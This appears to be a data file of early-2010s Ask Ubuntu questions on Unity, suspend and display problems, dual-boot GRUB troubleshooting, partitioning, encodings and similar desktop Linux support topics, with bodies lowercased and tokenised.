10198	multiple displays + unity	i was wondering how unity looks and functions with 2 or 3 monitors running at the same time . can the main bar be moved to the top or bottom of the screen ? having it just at the left of the middle screen would be atrocious . i run 3 monitors currently , but do n't have access to unity at the moment . can anyone give me an idea or post a screenshot of how it appears ?
10209	why is mono so controversial ?	oftentimes when i 'm reading about some program , be it gnome do or banshee or something else , i see people writing that they use mono -- and the implication is pejorative . why is this ? are these comments made on practical grounds , ideological ones , or something else ?
10213	steps for restoring the home directory ? ( user ids etc . )	say i have a home.tgz and want to drop that on a freshly installed ubuntu box . what do i need to do before i untar the file ? create users ? what about user ids ? groups ? what about encryption ?
10215	changing name of keymap in indicator applet	on my ubuntu machine , i have two keymaps ( us dvorak and us qwerty ) . is there a way to change what they show up as in the indicator applet 's layout switcher ? e.g . dvk/qwr instead of usa/usa2 amit ron-
10217	how can i tweak padding in ui elements ?	is there a way to tweak the amount of padding inside ui elements in ubuntu , besides installing a different gtk theme ? this is how eclipse looks in ubuntu ( with the radiance theme ) and this is how it looks on xp what i would like to do is reduce the padding around the icons in the toolbar or the padding around text in tabs . is there an app or some config file i could edit ?
10220	is there a way to permanently set the brightness level	for the sake of long battery life i decrease my laptop 's brightness as soon as i log in but when i reboot the laptop . the brightness goes back to full and i have to decrease it again . its really bugging me now . is there a way to permanently set the brightness level .
10221	failed to suspend	when i close the laptop lid and then open it after sometime , i see the message on my screen saying `` failed to suspend '' . what is the problem while the laptop is trying to suspend .
10223	display current layout ( language code/country flag ) in keyboard indicator	just upgraded from 10.04 to 10.10 , and the keyboard indicator applet no longer displays the two-letter country code for the active layout . this is terrible . is this the default behaviour ? anyone using two layouts ca n't tell which language they 're in . i ca n't seem to find the setting for this , it used to be in the preferences for keyboard layout . update 1 : in case this was n't obvious - i have two keyboard layouts - english and hebrew . i just upgraded form 10.04 , where the country code ( usa/il ) was displayed , overlaid on the flag . now all i get is a vague keyboard icon , and ca n't find the settings for this . update 2 : this seems to be a bug that people have been reporting since lucid , and is now back in maverick
10228	what 's the right terminology for unity 's ui elements ?	i 've sent a few mails to the ayatana mailing list regarding some ui suggestions for unity , but i 'm afraid i keep confusing the right terms for the ui element , so i would like to have some clarification . answer index : ubuntu 12.10 , 12.04 lts and 11.10 ubuntu 11.04
10230	a script to achieve optimum image compression from command line tools	i want to process images in batched for uploading onto websites . i am looking for a script which will provide optimum compression with 1024x768 size using commandline tools like image magic etc . edit : 1 here is one that i did on ms windows . orginally it was 3008x2000 . i used ms office picture manager to reduce the resolution to 1024x768 and the file size was around 600kb . then i ran it through sea monster and the final outcome was 1024x768 resolution and the file size was 84 kb . here is the picture : using the same process with image magic and smoosh.it gives a picture which has a size of 314 kb .
10232	vnc does n't work with compiz	currently vnc ( with nvidia gfx cards ) dont work with compiz.. will you be fixing this before 11.04 is released so that people can use vnc with the default desktop ?
10237	if i install 64-bit ubuntu 10.10 will flash work ?	i am currently downloading 64-bit ubuntu 10.10 but am seeing reports that there may be problems with flash . i 'm installing this for a friend and do n't want to have to find fixes or workarounds , so i 'd like to know beforehand if this is going to be straightforward or not . his main usage of flash would be on youtube .
10242	how to get internal sounds working with macbook	how to get internal sounds working with macbook ? i am using ubuntu 10.10 . sounds work when i use headset , but internal sounds does n't work .
10243	how do i turn on the executable bit in programs from mounted drives ?	i have ubuntu 10.10 dual booting with windows 7 . i have a couple of games on the windows partition , some of which can be run with wine . the problem is that i ca n't turn on the executable bit on files from mounted drives . when i go to properties and try to toggle it , it turns back off . i always need to copy said programs to the ubuntu filesystem , which is annoying . does anyone know how to solve this ? thanks
10244	how do i tether without root on ubuntu	currently i use pdanet for my windows machines , but after just installing ubuntu 10.10 netbook remix on my hp mini i realized that pdanet has no ubuntu client . is there any way to run pdanet or its services in linux ? does linux have an alternative android tethering client ? i tagged this as emulation because , being that this is a ubuntu forum , i am looking for a solution based in the os as android does n't seem to be helping me out . i am guessing that it might be something short of a vm solution , but this is a netbook and likely does n't have the resources to run virtualbox etc . *note : this is for a non-root , us motorola droid on verizon with 2.2 ( wifi disabled by carrier )
10252	gedit ca n't recognize character encoding , but gvim can	i have a lot of plain text files which come from a windows environment . many of them use a whacky default windows code-page , which is neither ascii ( 7 bits ) nor utf-8 . gvim has no problem opening these files , but gedit fails to do so . gvim reports the encoding as latin1 . i assume that gvim is making a `` smart '' assumption about the code-page . ( i believe this code-page still has international variants ) . some questions arise from this : ( 1 ) . is there some way the gedit can be told to recoginze this code-page ? ** nb . [ update ] for this point ( 1 ) , see my answer , below . ** for points ( 2 ) and ( 3 ) . see oli 's answer . ( 2 ) . is there a way to scan the file system to identify these problem files ? ( 3 ) . is there a batch converting tool to convert these files to utf-8 ? ( .. this old-world text mayhem was actually the final straw which brought me over to ubuntu ... utf-8 system-wide by default brilliant ) [ update ] ** nb : ** i now consider the following update to be partially irrelevent , because the `` problem '' files are n't the `` problem '' ( see my answer below ) . i 've left it here , because is may be of some general use to someone . i 've worked out a rough and ready way to identify the problem files ... the file command was not suitable , because it identified my example file as ascii ... but an ascii file is 100 % utf-8 compliant ... as i mentioned in a comment below , the test for an invalid first byte of a utf-8 codepoint is : if the first byte ( of a utf-8 codepoint ) is between 0x80 and 0xbf ( reserved for additional bytes ) , or greater than 0xf7 ( `` overlong form '' ) , that is considered an error i know sed ( a bit , via a win32 port ) , so i 've managed to cobble together a regex pattern which finds these offending bytes . it 's an ugly line , so look away now if regular expressions scare you : ) i 'd really appreciate it if someone points out how to use hex values in a range [ ] expression.. i 've just used the or operator \| fqfn= '' /my/fully/qualified/filename '' sed -n `` /\x80\|\x81\|\x82\|\x83\|\x84\|\x85\|\x86\|\x87\|\x88\|\x89\|\x8a\|\x8b\|\x8c\|\x8d\|\x8e\|\x8f\|\x90\|\x91\|\x92\|\x93\|\x94\|\x95\|\x96\|\x97\|\x98\|\x99\|\x9a\|\x9b\|\x9c\|\x9d\|\x9e\|\x9f\|\xa0\|\xa1\|\xa2\|\xa3\|\xa4\|\xa5\|\xa6\|\xa7\|\xa8\|\xa9\|\xaa\|\xab\|\xac\|\xad\|\xae\|\xaf\|\xb0\|\xb1\|\xb2\|\xb3\|\xb4\|\xb5\|\xb6\|\xb7\|\xb8\|\xb9\|\xba\|\xbb\|\xbc\|\xbd\|\xbe\|\xbf\|\xf8\|\xf9\|\xfa\|\xfb\|\xfc\|\xfd\|\xfe\|\xff/p '' `` $ { fqfn } '' so , i 'll now graft this into oli 's batch solution ... thanks oli ! ps . here is the invalid utf-8 byte it found in my sample file ... '' h.bork , gă¸te-borg . '' ... the `` ă¸ '' = f8 hex ... which is an invalid utf-8 character .
10258	how to change live cd splash screen	i 'm remastering the ubuntu cd , i 've changed some files in the isolinux folder ( access.pcx , blank.pcx , gfxboot.cfg ) and i have been able to change the first screen ( background color to green ) : but i ca n't change the second screen . i made my own plymouth-theme package , and removed the plymouth-theme-ubuntu-text package . but this standard ubuntu screen is still displayed . after installation , my own plymouth theme is well displayed . so , i 'm lost , is this screen related to plymouth ? ( if so , how can it be displayed after removing plymouth-theme-ubuntu-text ) or is it another file to modify ?
10260	suddenly the screen turns black and error ( process:328 ) : glib-warning ** : getpwuid_r ( ) : failed due to unknown user id ( 0 )	i 'm using ubuntu 10.10 and today during surfing suddenly the screen turned black with this error message ( process:295 ) : glib-warning ** : getpwuid_r ( ) : failed due to unknown user id ( 0 ) what can be the reason ?
10264	the future of the ubuntu family	how would the unity path canonical is going through regarding desktop environment affect the other flavours of ubuntu ? i mean official or almost kubuntu , xubuntu , and perhaps others not officially supported variations will follow a different path ...
10267	how do i get and install an unmodified kernel ?	so , i want to learn how to develop drivers for linux . and for that i heard it 's recommended to use an unmodified kernel , since distributions can patch/change it a lot . i downloaded ubuntu 10.04 ( lucid ) : http : //releases.ubuntu.com/lucid/ubuntu-10.04.1-desktop-i386.iso.torrent i found this page : https : //wiki.ubuntu.com/kernel/mainlinebuilds how do i know what 's the most compatible kernel version for that ubuntu release ? i could not understand from the wiki page .
10271	is running ubuntu one on debian 'possible ' ?	i read somewhere that ubuntu one only runs on ubuntu , which was a surprise ( and i suppose it 's just an official stance ) . what will it take for me to run it on debian ?
10272	will connman replace networkmanager on the desktop for 11.04 ?	in the 10.10 release , unity on the netbook edition used connman . as unity is now moving to the desktop for 11.04 , will that mean that connman will replace networkmanager on the default ubuntu desktop as well ?
10273	hibernate and suspend do not exist anymore , help	when i close the lid of my laptop and open it after some time i am greeted with a message `` failed to suspend '' . when i tried to manually suspend/hibernate , i saw these options are not available there at all . of course , they did exist when i did the fresh installation but i ca n't see them anymore . i am totally pissed off with this . please help .
10282	wireless ad-hoc network between ubuntu and ms windows	i have setup a wireless ad-hoc connection between two laptops : one running ubuntu and the other ms xp . i have assigned static ip to both the laptops and both get connected quite easily . i can access all ubuntu services like ssh , squid , samba from the laptop running ms windows . but from ubuntu machine i can not access any windows services like shared directories etc . the windows machine does n't even respond to ping requests from ubuntu .
10283	how do i create a wireless ad-hoc network ?	whenever i need to copy some files and couldnt find a pen drive , [ i dont have bluetooth enabled in my lap ] , i create a new ad hoc ( wireless ) network in windows and share the necessary files on the network and share files with the other system . now , i want to do the same with ubuntu . but , i could n't . i could create a new network , but i am not able to chare or send or even dont know how to access the system connected to the network . so , how can i do this ? thanks
10286	will there be the normal gnome desktop available for download	will we have a gnome version of ubuntu available for download like kubuntu is for kde and xubuntu is for xfce . maybe something like 'gubuntu ' for gnome
10287	how do i reset the icons in the notification area back to their default locations ?	i restarted my computer and now they are all out of order , how do i put them back in the proper order ?
10290	how do i improve boot speed ?	i have seen many videos that make ubuntu faster , but only makes the desktop faster . i am looking to make my computer boot faster . is their anything i can do to make ubuntu boot significantly faster ?
10291	wifi works on windows vista , but not on ubuntu	i am not able to connect to wifi using ubuntu 10.04 , but on the same machine i am able to connect to it using windows vista . i had posted this question about it earlier , but none of the solutions work . i have the ubuntu 10.04 lts cd with me , how can i get wifi to work ?
10294	run ( system ) script on ssh login and/or logout	i 'd like my openssh server to start a script whenever a user logs in using ssh , ideally passing the host name or ip , as well as the user name . additionally i 'd like it to run a script , whenever a session is terminated ( passing the username ) . these scripts should not run in the user 's session , but system wide . the idea is to give an audio warning on login and logout , e.g . using espeak , and to display the information on an external display . i 've seen that there is a pam-scripts package but i 'm not sure if this does what i want , nor how to use it . any help is appreciated ! -- markus
10298	how do i bring unity interface in-front of all other windows ?	as ubuntu is switching to unity in 11.04 it seemed reasonable to try it on my 10.10 desktop . unfortunately , when i launch it i see the icons down the left-hand side but the rest of the unity interface if obscured by any other windows i have open . for example , when i click the applications icon in unity if i have another window open it does n't seem to do anything until i minimize the active window revealing the application list in the background . it 's the same for the menu that appear when i right-click on on icon . what could be causing this and how do i fix it ?
10301	can i upgrade to maverick and keep my kernel ?	i have been using ubuntu since 9.04 without many ( serious ) problems , i installed the 10.10 cd and put it on a flash drive ( after a while or looking through the web to realize that the startup disk creator breaks with maverick . anyway , when i booted from flash , it would get completely stuck ( no cursor , no blinking line at the top , just nothing ! ) . so i went back to my lucid install and did a `` update-manager -d '' . when the upgrade was done , i rebooted , and was faced with the same problem again . i had to manually edit the `` grub.cfg '' file to set the lucid old kernel as default . again i was faced with a new problem : virtualbox could n't find the kernel files because upgrading the kernel deleted some files that were required . what i need to know is if there is a way to upgrade from lucid to maverick without the new kernel ( i still do n't understand why it broke , but oh well ! ) my specs are : toshiba satellite a215 , dual core amd athlon-x2 ati radeon x1200 ( been using the default driver for it since jaunty ) ubuntu lucid with latest updates please help , and thanks in advance
10304	installing matcad11 or matcad14	i was wondering if anyone knows if i can install and run matcad11 or 14 on my system .
10308	what kernel version comes with ubuntu 10.04.1 ?	could you tell me the version number of the 10.04.1 kernel ?
10311	dell t3500 precision workstation will not boot after an update from 10.04 to 10.10	i 'm having trouble booting ubuntu after upgrading to 10.10 . after the unexpected exit with status 0x0009 message , it said : gave up waiting for root device : common problems : - boot args ( cat /proc/cmdline ) - check rootdelay = ( did system wait long enough ? ) - check root = ( did the system wait for the right device ? ) - missing moduloes ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/ ( some big name for my hard drive ) does not exist . dropping to a shell ! busybox v1.13.3 ... ( initramfs ) this thread describes the problem that many people are having with t3500 and ubuntu 10.10 . i was able to boot an older kernel , but i 'd like to get this working with the latest kernel . working kernel uname -a reads linux workstation 2.6.32-25-generic # 45-ubuntu smp sat oct 16 19:52:42 utc 2010 x86_64 gnu/linux not-working kernel = 2.6.35-22-generic
10319	compile mercurial	i 'm trying to install latest version of mercurial ( 1.6.4 ) into my ubuntu 10.10 but i 'm getting this error when i do `` make install '' : could n't import standard zlib ( incomplete python install ) worth knowing that i compiled and installed python 2.7 successfully , though , this error still appeared before installing 2.7 . ( think ubuntu 10.10 comes with 2.6 ) what 's the problem ?
10329	automatic kernel reload after update	i have been managing a ubuntu server 8.04 for quite some time now . on top of it i am running a vmware server edition , which needs to recompile it 's modules whenever a new kernel is installed . for that i 'm executing : sudo vmware-config.pl until now , whenever a new version of the kernel was available i installed it , rebooted the system and rebuild the modules . but now i realized - rather by accident - , that rebuilding those kernel modules even worked without rebooting the system . vmware is even able to startup again after that . that made me curious . i entered uname -r to see the kernel version , which showed me exactly the version i installed right before without rebooting the system . the manpages for uname are not exactly detailed on what is actually printed , but so far i thought it printed the actually running kernel version . my question now is : is it really possible the kernel reloads itself without rebooting ? i did not install ksplice or a similar tool . from what i get it is now even in the repositories for ubuntu server 8.04 . what 's going on with my system ? do i have to reboot after the kernel update or not ? what does uname -r print ? is the ubuntu server edition shipped with a program similar to ksplice ? i never read anything about a feature like that ! i checked what kees told me to do : uname -r 2.6.24-28-server the file in proc gave : cat /proc/version_signature ubuntu 2.6.24-28.75-server and dpkg : dpkg -l 'linux-image* ' | grep ^.i ii linux-image-2.6.24-28-server 2.6.24-28.80 obviously i should do a reboot then : ) thanks for the detailed information !
10331	any complete gui interface for mercurial ?	i 've tried tortoisehg from the repositories , but it was n't working at all .
10334	how do i find ubuntu users in my country / state	i am looking to get meet other users how do i find that team .
10342	website display problem - across all browsers	whenever i go to getpersonas.com or youtube the page loads like this : how can i fix this ?
10344	why would the docky launcher stop and disappear when i empty the trash when unmounting a removable drive ?	after i finish working with a removable flash drive i click eject icon in nautilus . if it is appropriate i get a dialog asking if i would like to empty the trash before it un-mounts . i click yes and everything works fine except my docky launcher disappears . all i need to do is go up to the menu and re-start it , but that ca n't be right , and i 'm not sure how to make it quit . if it matters i have the trash , and mounter docklets running .
10355	is there an app which graphically logs/displays file-system i/o ?	system monitor gives me a graphical display of network data flow . is there something similar for the data flow on the local file-system itself ?
10356	what is my user login password ?	just got a new netbook running ubuntu . when i turn it on it auto-logs-in to the desktop automatically , but when i try to connect to the wireless network it wants my keyring password to store the password . problem is it is n't in the documentation ( yes , i read the documentation . ) i see a lot of people asking about `` enter password to unlock your login keyring '' and the cause usually centers around either they forgot the password , or the keyring password is different than the login password . so the advice is either how to change the keyring password to match the login , or deleting the keyring and creating a new one with a password they remember . while i could delete and recreate the keyring , i still would n't know the login password . without the login password i can not run sudo either . i tried blank for the keyring password and that did n't work either . also , i know that the root password is blank , and the account is disabled . so i am not asking about that . question comes down to this : is there a way to discover the password for the account that was auto-logged in ? if not can i change it ? i 'm up for reinstalling if i have to , but would rather not . besides , it is a netbook and does not have a optical drive .
10361	where can i find all the milestones of the current ubuntu development release ?	where can i find all the milestones of the current development release ?
10363	i have a tecra a4 laptop . how can i ensure i have the latest graphics driver for it ?	i have a tecra a4 laptop . how can i ensure i have the latest graphics driver for it ? according to http : //alatest.com/reviews/laptop-reviews/toshiba-tecra-a4-s211/po3-32484355,30/ # details , i have a ati mobility radeon x600/nvidia geforce go 6600 when i go to system > administration > additional drivers , it does a check and says `` no proprietary drivers are in use on this system '' with a black list box and a disabled enable button .
10373	do i need to have 'antivirus software ' installed ?	i thought that there was no need to scan for viruses either in ubuntu or any linux distros until i found virus scanner packages 'clamtk ' and 'klamav ' in ubuntu software center yesterday . this leads to the following questions : how do viruses differ between linux and windows ? how do the strategies for protection differ between linux and windows ? should a virus scanner package be installed on my system ? if so , which would be a better option ?
10379	how do i listen to song samples on the itunes website ?	how do i listen to song samples on the itunes website in ubuntu 10.04 ?
10383	what sort of information do i need to send a bug report to nouveau developers ?	i 'm aware that nouveau on ppc is `` known to work '' more than `` rigorously tested '' but i 'm having issues with certain opengl 2d programs ( not 3d ) where the colors are completely off . while it could be an issue w/ the application ( note alpha in title ) , sdl works well , if not a bit slow . what information should i capture in order to send upstream ?
10384	blank screen after switch user or resume	about half the time when i switch users or resume from standby or resume the screen goes blank ( black ) . if i work the cursor keys i can hear the system bell when it gets to the end of the user list . i can also successfully login , going from memory , but screen stays black . sometimes closing and re-opening the lid will light up the screen again . pressing the special function key to enable/disable external monitor connection has no effect [ fn ] - [ f5 ] , [ fn ] - [ f6 ] . if none of the previous work i need to put the computer into hibernation or full power off to restore screen function . if i watch closely when switching users i think i can see the screen initially start to light up and then quickly fade to black . the computer is an acer aspire 3500 , model zl6 , running ubuntu 10.10 installed 2 days ago . no proprietary drivers are in use . i 'll provide a list of hardware details as soon as i can figure out how to generate that ( did n't there used to be an entry for hardware details under the system menu ? ) . possibly related questions : no resume after hibernate or standby when i resume from suspension - the screen is blank switch user fails to complete successfully for what it 's worth , blank after resume also used to happen occasionally when the laptop was running xp-home , but nowhere near as often , perhaps 6 or 8 times a year . update : i found system > administration > system testing and ran the monitor test . it went very very dark , but the window elements could be discerned , and the whole screen flashed ( from very very dark to black ) . on the third repeat of that same test the screen went to full blaupck and stayed there . moving the mouse , via touchpad , or touch keys did not wake it up again . i had to close the lid and put the computer into hibernate , and press the power button to restore it . update2 : output of lshw : http : //pastebin.com/q7n8676r , lspci : http : //pastebin.com/6ujzvk4r update3 : sometimes i can restore the screen by flipping to console 1 with ctrl-alt-f1 and then back to graphical with ctrl-alt-f7 .
10387	is there a way to restore/format an ipod under linux ?	i have an ipod classic , and it 's full of duplicates and it 's a complete mess and would like to start anew , and i was curious if there was a way to restore an ipod like you could under windows/mac ?
10389	how can i import bzr branches into git ?	i am quite used to using git , is there an easy way to import/export from bzr into git and back bzr once i have made commits ?
10390	no sound after resuming from suspend ?	when my system gets to suspension while the song being played , and got resumed from the suspension , i found my rhythmbox player running but no sound coming even from the system . i had to suspend it and press the power button to get the sound back . why is it happening so ?
10392	changing ldap password expiry time ?	i am running ldap samba pdc on ubuntu 10.04 server . by default the ldap account pasword expires in 45 days . i want to change it . i 've tried hard to find this setting in the ldap conf files but i could n't . what conf file needs to be edited to make this change ?
10395	untrusted application launcher ?	some time ago , ubuntu introduced a security `` feature '' , that would only allow trusted .desktop apps to be run , on other apps it would pop up a message . nothing new so far , however , said message used to have a button to make the app `` trusted '' , but that button does n't exist anymore : what 's the point of this dialog ?
10402	is there software like music maker ?	i 'm looking for a tool such as magix music maker for ubuntu ( and free , if possible ) . i know that there is lmms , audacity , rosegarden , but i 'm especially looking for a studio that includes basic sounds like drums , guitar sounds , bass ( such as magix music maker does ) . in mmm i can pretty much click my song together using sound sets ... which is awesome . : is there such a tool for ubuntu ?
10406	will there be a vala template for quickly ?	are there plans to develop a vala template for quickly ? would be interesting because i think , vala will be the next gen programming language for gnome .
10410	windows 7 does n't boot after ubuntu install	i had windows 7 installed on my pc , then i installed ubuntu 10.10/ during the installation process i have chosen to manually set my partitions : i set a 10gb drive for ubuntu root 1gb drive for swap and for boot drive i 've chosen the one used by windows 7 now i can boot ubuntu , i have the windows 7 option in the boot list , but when i choose windows 7 , it shows me a black screen for a second and returns back to boot screen . boot info script 0.55 dated february 15th , 2010 ============================= boot info summary : ============================== = > windows is installed in the mbr of /dev/sda sda1 : _________________________________________________________________________ file system : ntfs boot sector type : grub 2 boot sector info : grub 2 is installed in the boot sector of sda1 and looks at sector 304908237 of the same hard drive for core.img , but core.img can not be found at this location . no errors found in the boot parameter block . operating system : windows 7 boot files/dirs : /bootmgr /boot/bcd /windows/system32/winload.exe sda2 : _________________________________________________________________________ file system : ntfs boot sector type : windows xp boot sector info : no errors found in the boot parameter block . operating system : boot files/dirs : sda3 : _________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : _________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 10.10 boot files/dirs : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda4 : _________________________________________________________________________ file system : swap boot sector type : - boot sector info : =========================== drive/partition info : ============================= drive : sda ___________________ _____________________________________________________ disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start end size id system /dev/sda1 * 63 62,894,474 62,894,412 7 hpfs/ntfs /dev/sda2 62,894,478 291,579,749 228,685,272 7 hpfs/ntfs /dev/sda3 291,579,811 309,157,937 17,578,127 5 extended /dev/sda5 291,579,813 309,157,937 17,578,125 83 linux /dev/sda4 309,159,936 312,580,095 3,420,160 82 linux swap / solaris blkid -c /dev/null : ____________________________________________________________ device uuid type label /dev/sda1 1266bb2766bb0a8d ntfs /dev/sda2 bedbf1147c76f703 ntfs data /dev/sda3 : pttype= '' dos '' /dev/sda4 dd38226d-c7c9-4ae5-a726-6d18d34a22e4 swap /dev/sda5 e1dafd1c-f855-406b-8f9a-f9d527c70255 ext4 /dev/sda : pttype= '' dos '' ============================ `` mount | grep ^/dev output : =========================== device mount_point type options /dev/sda5 / ext4 ( rw , errors=remount-ro , commit=0 ) =========================== sda5/boot/grub/grub.cfg : =========================== # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set e1dafd1c-f855-406b-8f9a-f9d527c70255 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set e1dafd1c-f855-406b-8f9a-f9d527c70255 set locale_dir= ( $ root ) /boot/grub/locale set lang=en insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , with linux 2.6.35-22-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set e1dafd1c-f855-406b-8f9a-f9d527c70255 linux /boot/vmlinuz-2.6.35-22-generic root=uuid=e1dafd1c-f855-406b-8f9a-f9d527c70255 ro quiet splash initrd /boot/initrd.img-2.6.35-22-generic } menuentry 'ubuntu , with linux 2.6.35-22-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set e1dafd1c-f855-406b-8f9a-f9d527c70255 echo 'loading linux 2.6.35-22-generic ... ' linux /boot/vmlinuz-2.6.35-22-generic root=uuid=e1dafd1c-f855-406b-8f9a-f9d527c70255 ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.35-22-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set e1dafd1c-f855-406b-8f9a-f9d527c70255 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set e1dafd1c-f855-406b-8f9a-f9d527c70255 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set 1266bb2766bb0a8d chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # =============================== sda5/etc/fstab : =============================== # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda5 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda4 during installation uuid=dd38226d-c7c9-4ae5-a726-6d18d34a22e4 none swap sw 0 0 =================== sda5 : location of files loaded by grub : =================== 156.1gb : boot/grub/core.img 156.3gb : boot/grub/grub.cfg 149.9gb : boot/initrd.img-2.6.35-22-generic 156.3gb : boot/vmlinuz-2.6.35-22-generic 149.9gb : initrd.img 156.3gb : vmlinuz
10414	security of my built-in webcam and microphone	is there a way to control if your microphone and webcam is on ? or an easy way to securely disable it while you do n't need it ? i have a webcam and microphone built in to my notebook , which i never really need . i 'm just curious if programs or websites can easily access them .
10417	prevent flash from using webcam and microphone ?	how do you configure flash to not allow access to webcam and mic ? i 'm currently primarily interested in this for chrome , but if the solution is different for other browsers , please list it as well .
10419	windows 7 sees all ubuntu partitions as primary	i got a new laptop with windows 7 . i resized the windows partition and installed ubuntu 10.10 to the free space using manual partition , with several partitions for /boot , / , /home , swap , and another to be formated as ntfs to share files with the windows 7 boot . all worked perfectly in the ubuntu side , but the disk management of windows 7 sees all partitions as primary and do n't let me format the one i set aside for ntfs . i always thought that there could only be 4 primary partitions , so seeing 9 primary partions was unexpected . with all my previous computers this worked fine and i could use both systems to access the common data partition . there is a screenshot of windows 7 disk management : what should i do to fix this so i can format this common data to ntfs from windows , failing that how to format a partition as ntfs from linux ( i expect that to be more risky that from windows ) edit : this is the output of fdisk -l disco /dev/sda : 320.1 gb , 320072933376 bytes 255 cabezas , 63 sectores/pista , 38913 cilindros unidades = cilindros de 16065 * 512 = 8225280 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 512 bytes tamaño e/s ( mínimo/óptimo ) : 512 bytes / 512 bytes identificador de disco : 0x949ef5d2 dispositivo inicio comienzo fin bloques id sistema /dev/sda1 1 5 40131 de utilidad dell /dev/sda2 * 6 1918 15360000 7 hpfs/ntfs /dev/sda3 1918 8258 50931829+ 7 hpfs/ntfs /dev/sda4 8259 38914 246238209 5 extendida /dev/sda5 8259 8271 97280 83 linux /dev/sda6 36969 38914 15624192 82 linux swap / solaris /dev/sda7 8271 14350 48827392 83 linux /dev/sda8 14350 16781 19529728 83 linux /dev/sda9 33321 36969 29296640 83 linux /dev/sda10 16781 33320 132852736 83 linux las entradas de la tabla de particiones no están en el orden del disco the partition 10 that i wanted in ntfs appeared as of linux type , even when in the installer i did n't select that . i tried changing that to ntfs with the disk utility and it stalled changing it . installed gparted but every time i run it crash with glibmm-error ** : unhandled exception ( type std : :exception ) in signal handler : what : basic_string : :_s_create finally changed the type with fdisk to 0x07 . the output of fdisk changed only in this line /dev/sda10 16781 33320 132852736 7 hpfs/ntfs now windows 7 shows this partition and only this partition as being inside an extended partition . is there a way to validated my partition table as correct before it bombs .
10420	what will the role of the desktop folder be in unity ?	ubuntu has traditionally had some default folders . most of them ( e.g . music , videos ) were there because they were intended to house a specific type of file . desktop , however , was there because it was special in that its contents would be shown on the user 's desktop . this does n't seem to be the case anymore , since unity 's desktop only shows the wallpaper . how is this going to be handled ? will the desktop folder be assigned a different purpose ? will it just be removed from default installs ? will its contents still have a special place ? also , can we expect unity 's desktop to show anything else besides the wallpaper in the future ?
10432	gnuplot remove overlapping between xtick labels	in gnuplot , i am setting xtics to something like this : set xtics ( `` aim '' 0.00000 , `` gtalk '' 2.00000 , `` rtp-multicast-filetransfer '' 4.00000 , `` sipc_music '' 6.00000 , `` skype1 '' 8.00000 , `` skype2 '' 10.00000 , `` voip-extension '' 12.00000 , `` voip-extension2downata '' 14.00000 , `` ymessenger '' 16.00000 ) the problem is , that these labels overlap with each other in the plot , so how can i remove/overcome this overlapping ? can i increase the length between xticks or write some kind of legend showing : rmf : rtp-multicast-filetransfer ?
10434	which way is the best to manage a workstation from windows server 2008 ?	i mean , are there any tools to manage mixed networks with windows and ubuntu workstations from single windows server 2008 ? some like gpo or windows managment console .
